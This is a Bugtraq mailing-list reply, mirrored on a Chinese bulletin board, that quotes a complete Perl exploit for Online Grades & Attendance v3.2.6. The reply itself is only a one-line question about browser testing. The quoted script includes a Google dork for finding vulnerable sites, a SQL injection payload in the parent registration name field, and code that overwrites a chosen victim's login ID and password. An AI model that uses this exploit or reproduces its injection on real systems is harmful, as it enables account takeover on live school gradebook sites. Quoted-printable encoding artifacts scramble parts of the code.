Re: (Post Form --> Parent Register (name)) Credentials Changer (

看板Bugtraq作者0xjbrown41.時間16年前 (2009/06/02 03:32)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串1/1

Why do you include "TESTED ON: firefox 3"? Would you not be able to trigger this bug using other browsers? On Sun, May 31, 2009 at 8:53 PM, <y3nh4ck3r@gmail.com> wrote: > #!/usr/bin/perl > #------------------------------------------------------------------------= ------------------------------------------- > #(Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOI= T -- Online Grades & Attendance v-3.2.6--> > #------------------------------------------------------------------------= ------------------------------------------- > # > #CMS INFORMATION: > # > #-->WEB: http://www.onlinegrades.org/ > #-->DOWNLOAD: http://www.onlinegrades.org/ > #-->DEMO: http://www.onlinegrades.org/demo_info > #-->CATEGORY: CMS / Education > #-->DESCRIPTION: Online Grades is based on the project, Basmati. It has a= ll of the same > # =A0 =A0 =A0 =A0 =A0 =A0 =A0 features plus many new features. OG is a we= b based grade... > #-->RELEASED: 2009-02-05 > # > #CMS VULNERABILITY: > # > #-->TESTED ON: firefox 3 > #-->DORK: "Powered by Online Grades" > #-->CATEGORY: SQL INJECTION > #-->AFFECT VERSION: <=3D 3.2.6 > #-->Discovered Bug date: 2009-05-21 > #-->Reported Bug date: 2009-05-21 > #-->Fixed bug date: Not fixed > #-->Info patch: Not fixed > #-->Author: YEnH4ckEr > #-->mail: y3nh4ck3r[at]gmail[dot]com > #-->WEB/BLOG: N/A > #-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) = por su apoyo. > #-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) > # > # > #------------ > #CONDITIONS: > #------------ > # > #gpc_magic_quotes=3DOFF > # > #----------------- > #PRE-REQUIREMENTS > #----------------- > # > #Option --> Self Registration --> Allowed (Default value) > # > #------- > #NEED: > #------- > # > #Valid parent id > # > #--------------------------------------- > #PROOF OF CONCEPT (SQL INJECTION): > #--------------------------------------- > # > #Register module (name) is vuln to sql injection. > # > #Full name --> y3nh4ck3r', id=3D1 ON DUPLICATE KEY UPDATE client_id=3D'ow= ned'# > # > #Other parameters --> something > # > # > #Return: Change client_id to 'owned' for parent id=3D1 > # > # > ####################################################################### > ####################################################################### > ##*******************************************************************## > ## =A0SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... =A0= ## > ##*******************************************************************## > ##-------------------------------------------------------------------## > ##*******************************************************************## > ## =A0 =A0 =A0 =A0 =A0 =A0 =A0GREETZ TO: SPANISH H4ck3Rs community! =A0 = =A0 =A0 =A0 =A0 =A0 =A0 =A0## > ##*******************************************************************## > ####################################################################### > ####################################################################### > # > # > use LWP::UserAgent; > use HTTP::Request; > #Subroutines > sub lw > { > =A0 =A0 =A0 =A0my $SO =3D $^O; > =A0 =A0 =A0 =A0my $linux =3D ""; > =A0 =A0 =A0 =A0if (index(lc($SO),"win")!=3D-1){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$linux=3D"0"; > =A0 =A0 =A0 =A0}else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$linux=3D"1"; > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0if($linux){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system("clear"); > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system("cls"); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system ("title Online Grades Attendance v-= 3.2.6 (Credentials changer) Exploit"); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0system ("color 02"); > =A0 =A0 =A0 =A0} > } > sub request { > =A0 =A0 =A0 =A0my $userag =3D LWP::UserAgent->new; > =A0 =A0 =A0 =A0$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windo= ws NT 5.1)'); > =A0 =A0 =A0 =A0if($_[2] eq "post"){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request =3D HTTP::Request -> new(POST =3D= > $_[0]); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request->referer($_[0]); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request->content_type('application/x-www-= form-urlencoded'); > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request->content($_[1]); > =A0 =A0 =A0 =A0}else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$request =3D HTTP::Request -> new(GET =3D>= $_[0]); > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0my $outcode=3D $userag->request($request)->as_string; > =A0 =A0 =A0 =A0return $outcode; > } > sub error { > print "\t------------------------------------------------------------\n"; > =A0 =A0 =A0 =A0print "\tWeb isn't vulnerable!\n\n"; > =A0 =A0 =A0 =A0print "\t--->Maybe:\n\n"; > =A0 =A0 =A0 =A0print "\t\t1.-Patched.\n"; > =A0 =A0 =A0 =A0print "\t\t2.-Bad path or host.\n"; > =A0 =A0 =A0 =A0print "\t\tEXPLOIT FAILED!\n"; > =A0 =A0 =A0 =A0print "\t-------------------------------------------------= -----------\n"; > } > sub errormagicquotes { > print "\t------------------------------------------------------------\n"; > =A0 =A0 =A0 =A0print "\tWeb isn't vulnerable!\n\n"; > =A0 =A0 =A0 =A0print "\t\tRaison--> Magic quotes ON.\n"; > =A0 =A0 =A0 =A0print "\t\tEXPLOIT FAILED!\n"; > =A0 =A0 =A0 =A0print "\t-------------------------------------------------= -----------\n"; > } > sub helper { > =A0 =A0 =A0 =A0print "\n\t[!!!] Online Grades & Attendance <=3D v-3.2.6 (= Credentials changer) Exploit\n"; > =A0 =A0 =A0 =A0print "\t[!!!] USAGE MODE: [!!!]\n"; > =A0 =A0 =A0 =A0print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Pass= word] [Target_id]\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [HOST]: Web.\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [PATH]: Home Path.\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [Email Address]: Set value\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [Password]: Set value\n"; > =A0 =A0 =A0 =A0print "\t[!!!] [Target_id]: victim id\n"; > =A0 =A0 =A0 =A0print "\t[!!!] Example: perl $0 'www.onlinegrades.org' 'de= mo' 'y3nh4ck3r' 'y3nh4ck3r' '1' \n"; > } > #Main > &lw; > print "\t#######################################################\n\n"; > print "\t#######################################################\n\n"; > print "\t## =A0 =A0 =A0 =A0Online Grades & Attendance <=3D v-3.2.6 =A0 = =A0 =A0##\n\n"; > print "\t## =A0 =A0 =A0 =A0 =A0 (Credentials changer) Exploit =A0 =A0 =A0= =A0 =A0 ##\n\n"; > print "\t## =A0 =A0 =A0 =A0 ++Conditions: magic_quotes=3DOFF =A0 =A0 =A0 = =A0 =A0 =A0##\n\n"; > print "\t## =A0 =A0 =A0 =A0 ++Needed: Valid parent id =A0 =A0 =A0 =A0 =A0= =A0 =A0 =A0 ##\n\n"; > print "\t## =A0 =A0 =A0 =A0 =A0 =A0 =A0 Author: Y3nh4ck3r =A0 =A0 =A0 =A0= =A0 =A0 =A0 =A0 =A0 ##\n\n"; > print "\t## =A0 =A0 =A0Contact:y3nh4ck3r[at]gmail[dot]com =A0 =A0 =A0 =A0= =A0 ##\n\n"; > print "\t## =A0 =A0 =A0 =A0 =A0 =A0Proud to be Spanish! =A0 =A0 =A0 =A0 = =A0 =A0 =A0 =A0 =A0 ##\n\n"; > print "\t#######################################################\n\n"; > print "\t#######################################################\n\n"; > #Init variables > my $host=3D$ARGV[0]; > my $path=3D$ARGV[1]; > my $client_id=3D$ARGV[2]; > my $client_pw=3D$ARGV[3]; > $numArgs =3D $#ARGV + 1; > if($numArgs<=3D3) > =A0 =A0 =A0 =A0{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0&helper; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0exit(1); > =A0 =A0 =A0 =A0} > =A0 =A0 =A0 =A0if(!$ARGV[4]){ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$target_id=3D1; > =A0 =A0 =A0 =A0}else{ > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0$target_id=3D$ARGV[4]; > =A0 =A0 =A0 =A0} > > #Build uri > my $finalhost=3D"http://".$host."/".$path."/parents/register.php?action= =3Dregister"; > my $phpinfo=3D"http://".$host."/".$path."/include/phpinfo.php"; > #sql injection > $injection=3D"y3nh4ck3r', id=3D".$target_id." ON DUPLICATE KEY UPDATE cli= ent_id=3D'".$values."'#"; > $post=3D"name=3D".$injection."&email=3Dy3nh4ck3r%40gmail.com&pass1=3Dy3nh= 4ck3r&pass2=3Dy3nh4ck3r"; > $output=3D&request($phpinfo,0,'get'); > if($output=3D~(/\<tr\>\<td class\=3D\"e\">magic\_quotes\_gpc\<\/td\>\<td = class\=3D\"v\"\>On\<\/td\>\<td class\=3D\"v\"\>On\<\/td\>\<\/tr\>/)){ > =A0 =A0 =A0 =A0&errormagicquotes; > =A0 =A0 =A0 =A0exit(1); > } > $injection_email=3D"y3nh4ck3r', id=3D".$target_id." ON DUPLICATE KEY UPDA= TE client_id=3D'".$client_id."'#"; > $post=3D"name=3D".$injection_email."&email=3Dy3nh4ck3r%40gmail.com&pass1= =3Dy3nh4ck3r&pass2=3Dy3nh4ck3r"; > $output=3D&request($finalhost, $post, 'post'); > $injection_pw=3D"y3nh4ck3r', id=3D".$target_id." ON DUPLICATE KEY UPDATE = client_pw=3D'".$client_pw."'#"; > $post=3D"name=3D".$injection_pw."&email=3Dy3nh4ck3r%40gmail.com&pass1=3Dy= 3nh4ck3r&pass2=3Dy3nh4ck3r"; > $output=3D&request($finalhost, $post, 'post'); > #processed > if($output!~(/\<strong\>ERROR\<\/strong\>/)) > { > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\n\t-------------------------------= ----------------------------------\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t-- =A0EXPLOIT EXECUTED (Online Gr= ades & Attendance <=3D v-3.2.6) =A0 --\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t-- =A0 =A0 =A0 =A0 =A0 =A0 =A0 = =A0 =A0(Credentials changer) Exploit =A0 =A0 =A0 =A0 =A0 =A0 =A0--\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t---------------------------------= --------------------------------\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t\tParent credentials changed!\n\n= "; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t\tIf id doesn't exist, you add a = new inconsistent user!\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\n\t<<<<<<----------------------FIN= ISH!---------------->>>>>>>>\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t<<<<<<--------------Thanks to: y3= hn4ck3r------------>>>>>>>\n\n"; > =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "\t<<<<<<-----------------------EOF-= ------------------->>>>>>>\n\n"; > }else{ > =A0 =A0 =A0 =A0&error; > } > exit(1); > #Ok...all job done >

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 0xjbrown41. 的文章

文章代碼(AID): #1A92or00 (Bugtraq)